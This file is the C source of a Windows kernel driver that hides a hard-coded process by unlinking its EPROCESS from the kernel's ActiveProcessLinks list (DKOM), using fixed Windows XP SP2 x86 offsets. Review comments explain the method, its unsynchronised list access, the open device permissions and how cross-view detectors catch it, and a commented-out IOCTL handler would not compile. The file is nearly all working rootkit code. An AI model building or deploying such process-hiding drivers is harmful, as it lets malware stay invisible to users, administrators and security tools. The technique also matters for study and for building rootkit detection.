📄 fristdriver.c

📁 Hiding a process with DKOM: unlinks the target's EPROCESS from the kernel's doubly linked active-process list (ActiveProcessLinks) so that list-based process enumeration no longer reports it
/////////////////////////////////////////////////
// 

#include <ntddk.h>
//#include "IoCTL.h"

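// Forward declarations for the routines defined further down in this file.
NTSTATUS DispatchCreateClose(PDEVICE_OBJECT pDevObj, PIRP pIrp);
void DriverUnload(PDRIVER_OBJECT pDriverObj);
// Declared but never registered: the DispatchIoctl definition below is commented out.
NTSTATUS DispatchIoctl(PDEVICE_OBJECT pDevObj, PIRP pIrp);
// Walks EPROCESS.ActiveProcessLinks starting at the current process; returns the
// EPROCESS address for terminate_PID, or 0 when it is not on the list (or PID is 0).
ULONG FindProcessEPROC (ULONG terminate_PID);
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegistryString);
// `(void)` rather than `()`: an empty parameter list is an unprototyped declaration
// in C, so the compiler would silently accept HideProc(anything).
NTSTATUS HideProc(void);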



// Device name and its symbolic-link name. The link lives in \?? (the global DOS
// device namespace), so any user-mode caller can open the device by name, and the
// device is created in DriverEntry without an explicit security descriptor.
// NOTE(review): confirm the default device DACL is acceptable before the
// commented-out IRP_MJ_DEVICE_CONTROL path is ever re-enabled.
#define DEVICE_NAME L"\\Device\\devDriverDemo"
#define LINK_NAME L"\\??\\slDriverDemo"



// FindProcessEPROC takes the PID of the process to find and

// returns the address of the EPROCESS structure for the desired process.

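ULONG FindProcessEPROC (ULONG terminate_PID)
{
	// EPROCESS field offsets. These are hard-wired for the 32-bit Windows XP SP2
	// kernel this sample targets: they move between Windows builds, and the ULONG
	// pointer arithmetic below only holds for 32-bit pointers. On any other kernel
	// the walk reads the wrong fields and will most likely bugcheck.
	const ULONG PID_OFFSET   = 0x84;    // EPROCESS.UniqueProcessId   (XP SP2 x86)
	const ULONG FLINK_OFFSET = 0x88;    // EPROCESS.ActiveProcessLinks (XP SP2 x86)
	// Sanity bound on the walk: the list is circular, so a healthy walk returns to
	// the starting PID long before this. Exceeding it means the list is corrupt or
	// the offsets are wrong for this kernel; bail out instead of spinning forever.
	const ULONG MAX_ENTRIES  = 65536;

	ULONG eproc;
	ULONG start_PID, current_PID;
	ULONG i_count;
	PLIST_ENTRY links;

	// PID 0 is never searched for; 0 doubles as the "not found" result.
	if (terminate_PID == 0)
		return 0;

	// Seed the walk with the calling process's EPROCESS and its PID.
	// NOTE(review): nothing here locks the active-process list, so a process
	// created or exiting mid-walk can leave us holding a stale pointer. The list
	// head itself is a bare LIST_ENTRY in the kernel, not an EPROCESS, so the
	// "PID" read while passing through it is meaningless (presumably why the
	// walk starts from the current process rather than from the head).
	eproc = (ULONG) PsGetCurrentProcess();
	start_PID = *((ULONG *)(eproc + PID_OFFSET));
	current_PID = start_PID;

	for (i_count = 0; i_count < MAX_ENTRIES; i_count++)
	{
		if (current_PID == terminate_PID)
			return eproc;                  // found

		// Seeing the starting PID again after at least one step means we have
		// gone full circle without a match.
		if (i_count >= 1 && current_PID == start_PID)
			return 0;

		// Advance: Flink points at the NEXT entry's ActiveProcessLinks field,
		// so subtract the field offset to get back to that EPROCESS's base.
		links = (PLIST_ENTRY)(eproc + FLINK_OFFSET);
		eproc = (ULONG) links->Flink - FLINK_OFFSET;
		current_PID = *((ULONG *)(eproc + PID_OFFSET));
	}

	return 0;   // walk bound exceeded (see MAX_ENTRIES)
}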





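// Splices the EPROCESS at `eproc` out of the active-process list, so walkers of
// ActiveProcessLinks (the usual source for process enumeration) no longer see it.
// Same XP SP2 x86 offset assumption as FindProcessEPROC.
static void UnlinkActiveProcessLinks(ULONG eproc)
{
	const ULONG FLINK_OFFSET = 0x88;   // EPROCESS.ActiveProcessLinks (XP SP2 x86)
	PLIST_ENTRY links = (PLIST_ENTRY)(eproc + FLINK_OFFSET);

	// Join the two neighbours to each other. Going through the LIST_ENTRY
	// members, rather than raw ULONG stores at Flink and Flink+1, no longer
	// bakes in the 4-byte pointer size and member order.
	links->Blink->Flink = links->Flink;
	links->Flink->Blink = links->Blink;

	// Point the orphaned entry at itself. The kernel will still touch these
	// links later (the original author notes a bugcheck otherwise, presumably
	// when the entry is unlinked again at process exit); self-links keep that
	// dereference inside valid memory and make the later unlink a no-op.
	links->Flink = links;
	links->Blink = links;
}

// Hides the process with PID HIDDEN_PID via DKOM on ActiveProcessLinks.
// Returns STATUS_SUCCESS, or STATUS_INVALID_PARAMETER when that PID is not on the
// list (already hidden, exited, or never existed).
// NOTE(review): the PID is a compile-time constant -- whatever happened to be 468
// on the author's machine -- so on another boot this hides an arbitrary process
// or nothing. The unlink is not synchronised with concurrent list walkers, and
// the process stays reachable through other kernel views (PID/handle lookup,
// thread lists), which is exactly what cross-view DKOM detectors compare.
NTSTATUS HideProc(void)
{
	const ULONG HIDDEN_PID = 468;
	ULONG eproc = FindProcessEPROC(HIDDEN_PID);

	if (eproc == 0)
	{
		DbgPrint("can't find the eproc!!");
		return STATUS_INVALID_PARAMETER;
	}

	UnlinkActiveProcessLinks(eproc);
	return STATUS_SUCCESS;
}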
// DriverEntry is invoked by the I/O manager when the driver is loaded.
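// Driver entry point: registers the dispatch routines, creates the control
// device and its \?? symbolic link, then immediately tries to hide the
// hard-coded PID.
//
// Returns STATUS_SUCCESS once the device and link exist; HideProc()'s result is
// only logged, so the driver stays loaded even when nothing was hidden.
// NOTE(review): IoCreateDevice is called without a security descriptor and the
// link sits in the global \?? namespace, so any local user can open the device.
// That exposes nothing while only CREATE/CLOSE are serviced, but if the
// commented-out IRP_MJ_DEVICE_CONTROL handler is ever re-enabled, create the
// device with IoCreateDeviceSecure and an SDDL string limited to SYSTEM/Admins.
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegistryString)
{
	NTSTATUS status;
	UNICODE_STRING ustrDevName;
	UNICODE_STRING ustrLinkName;
	PDEVICE_OBJECT pDevObj = NULL;

	(void)pRegistryString;   // the registry path is not used by this driver

	// Dispatch table: only open/close are serviced. DEVICE_CONTROL stays
	// unregistered (its handler below is commented out), so there is no IOCTL
	// surface at all.
	pDriverObj->MajorFunction[IRP_MJ_CREATE] = DispatchCreateClose;
	pDriverObj->MajorFunction[IRP_MJ_CLOSE]  = DispatchCreateClose;
	pDriverObj->DriverUnload = DriverUnload;

	// Control device object.
	RtlInitUnicodeString(&ustrDevName, DEVICE_NAME);
	status = IoCreateDevice(pDriverObj,
		0,                     // no device extension
		&ustrDevName,
		FILE_DEVICE_UNKNOWN,
		0,                     // no device characteristics
		FALSE,                 // not exclusive
		&pDevObj);
	if (!NT_SUCCESS(status))
		return status;

	// User-mode-visible name. Undo the device creation if the link cannot be
	// made so that a failed load leaves nothing behind.
	RtlInitUnicodeString(&ustrLinkName, LINK_NAME);
	status = IoCreateSymbolicLink(&ustrLinkName, &ustrDevName);
	if (!NT_SUCCESS(status))
	{
		IoDeleteDevice(pDevObj);
		return status;
	}

	// Hide the hard-coded PID right away. A failure is reported rather than
	// propagated: the driver deliberately returns success and stays loaded.
	if (STATUS_SUCCESS == HideProc())
		DbgPrint("haha hide ok!");
	else
		DbgPrint("HideProc failed: target PID not found on the active process list");

	return STATUS_SUCCESS;
}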



// I/O control dispatch routine -- currently dead code: both the IoCTL.h include and the
// IRP_MJ_DEVICE_CONTROL registration are commented out, and as written it would not
// compile (`case IO_PID_CTL` lacks its colon and IO_PID_CTL is not defined anywhere here).
/*NTSTATUS DispatchIoctl(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
	///////////////////////DispatchIoctl///////////////////////////////
	NTSTATUS IoCtlNtstus;
	PIO_STACK_LOCATION pIRPStack;
	ULONG uIoControlCode;
	PVOID pIoBuffer;
	ULONG uInSize;
	ULONG uOutSize ;

	//假设失败
	IoCtlNtstus = STATUS_INVALID_DEVICE_REQUEST;

	//IRP堆栈
	pIRPStack = IoGetCurrentIrpStackLocation(pIrp);

	//控制代码
	uIoControlCode = pIRPStack->Parameters.DeviceIoControl.IoControlCode;
	uInSize = pIRPStack->Parameters.DeviceIoControl.InputBufferLength;
	uOutSize = pIRPStack->Parameters.DeviceIoControl.OutputBufferLength;
	//
	pIoBuffer= pIrp-> AssociatedIrp.SystemBuffer;


	switch(uIoControlCode)
	{
		case IO_PID_CTL
		{
			IoCtlNtstus = STATUS_SUCCESS;
		}
		break;
	}
	//完成请求

	if(IoCtlNtstus == STATUS_SUCCESS)
		pIrp->IoStatus.Information = uOutSize;
	else
		pIrp->IoStatus.Information = 0;


	// 完成请求

	pIrp->IoStatus.Status = IoCtlNtstus;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT);

	return IoCtlNtstus;

}*/


// Unload routine: tears down the symbolic link and the device that DriverEntry
// created. It does NOT re-link the hidden process, so that process remains
// unlinked after the driver is gone (its ActiveProcessLinks point at itself,
// see the self-link step in HideProc).
void DriverUnload(PDRIVER_OBJECT pDriverObj)
{
	UNICODE_STRING linkName;

	DbgPrint("unload");

	// Drop the \?? name first so user mode can no longer reach the device,
	// then the device object itself (the only one this driver creates).
	RtlInitUnicodeString(&linkName, LINK_NAME);
	IoDeleteSymbolicLink(&linkName);
	IoDeleteDevice(pDriverObj->DeviceObject);
}

// Handles the IRP_MJ_CREATE and IRP_MJ_CLOSE major function codes.
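// Handles IRP_MJ_CREATE and IRP_MJ_CLOSE: every open and close of the control
// device succeeds unconditionally (no caller checks, no per-handle state).
// NOTE(review): since DriverEntry gives the device no explicit security
// descriptor, this means any local user can hold a handle to it.
NTSTATUS DispatchCreateClose(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
	(void)pDevObj;   // single device; nothing device-specific to do

	pIrp->IoStatus.Status = STATUS_SUCCESS;
	pIrp->IoStatus.Information = 0;   // no bytes transferred; do not leave a stale value

	IoCompleteRequest(pIrp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}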
